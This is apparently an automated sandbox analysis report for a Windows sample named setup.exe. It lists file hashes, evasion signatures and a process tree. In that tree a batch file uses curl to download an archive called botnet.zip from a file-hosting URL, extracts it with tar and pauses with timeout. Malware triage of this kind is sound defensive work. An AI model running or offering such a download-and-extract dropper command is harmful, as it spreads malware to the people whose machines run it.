Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

setup.exe

windows7-x64

7

setup.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    1161s
  • max time network
    1166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/08/2023, 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup.exe

  • Size

    90KB

  • MD5

    f0320cbabc449eb7dbef3b1dc5d22038

  • SHA1

    a89eb6460594feb2a6721a26ad8302a9f6176d73

  • SHA256

    0484cfb664a50ded3995d8b238ab2e6270a0687a199b1b1cf4044ac21c86d459

  • SHA512

    677908d4dc804a0856c4af18d1f4063f9f49a81c459acfab01a549bcea11d67d39660000ac00e63609d6fc9fbd7df2e986b508743367348629a8f0760802cfaf

  • SSDEEP

    1536:v7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfCwdOz:D7DhdC6kzWypvaQ0FxyNTBfCD

Score
1/10

Malware Config

Signatures

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\68CC.tmp\68CD.tmp\68CE.bat C:\Users\Admin\AppData\Local\Temp\setup.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3740
      • C:\Windows\system32\curl.exe
        curl -o botnet.zip https://download1654.mediafire.com/kuua0yqs84fggVARcWwN7HR_W2OC6J74shqHA7YVkSOtuD4T1_7OBFWnfyfALAdyAA0uacZSw6A3LhkXRy6FqI3igY-KiT8HJKETkje_DcfGADLuUn0c5YHDE-dvKMNA9mM9xP9IuQ50ySNQ0EYk5lsDtMSwoT-d-SzfqSiP8Yhn/f0hnyfm9ztyxr3j/1234.rar
        3⤵
          PID:1952
        • C:\Windows\system32\tar.exe
          tar -xf botnet.zip -C C:\Users\Administrator\Desktop\
          3⤵
            PID:1976
          • C:\Windows\system32\timeout.exe
            Timeout /t 5 /nobreak
            3⤵
            • Delays execution with timeout.exe
            PID:4600

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\68CC.tmp\68CD.tmp\68CE.bat
        Filesize

        908B

        MD5

        03725acb44af5b566d7ac3cb106cdf71

        SHA1

        ed76e05c7d21feedf8f9e5f28c68ffb747afdc2f

        SHA256

        c730a618518ba1872434365b30e5d28326a43a935a95347d2b23eedcdb75545d

        SHA512

        1d0e4e2c50605a3c3f6d898b1333e2a6b2095de8f5a11d77cec477bb399bbea45d7655a87d35026a65d871b49cbda2ba6f22cfaffdf6a20d9fa7c0e95c40c0e1

        Download Submit

      • C:\Users\Admin\Desktop\botnet.zip
        Filesize

        78.5MB

        MD5

        34c38c721f1fef9f3ed98be48dff3e90

        SHA1

        b64214f58e9d169e1fd212465fcf84cbf88a4f8a

        SHA256

        ee15d9a8ada76102b18fa6e3525bb964ddf183da6cb76bbe376dbe8976f25215

        SHA512

        99b0c9ca70ba29d4b0261d9347b8b9646eec04ad49d7f496e66e41d19c56fbed735e755e1162ce915dd941f4ba0591a260fa07ba43cc2876b32b33b9315e92f6

        Download Submit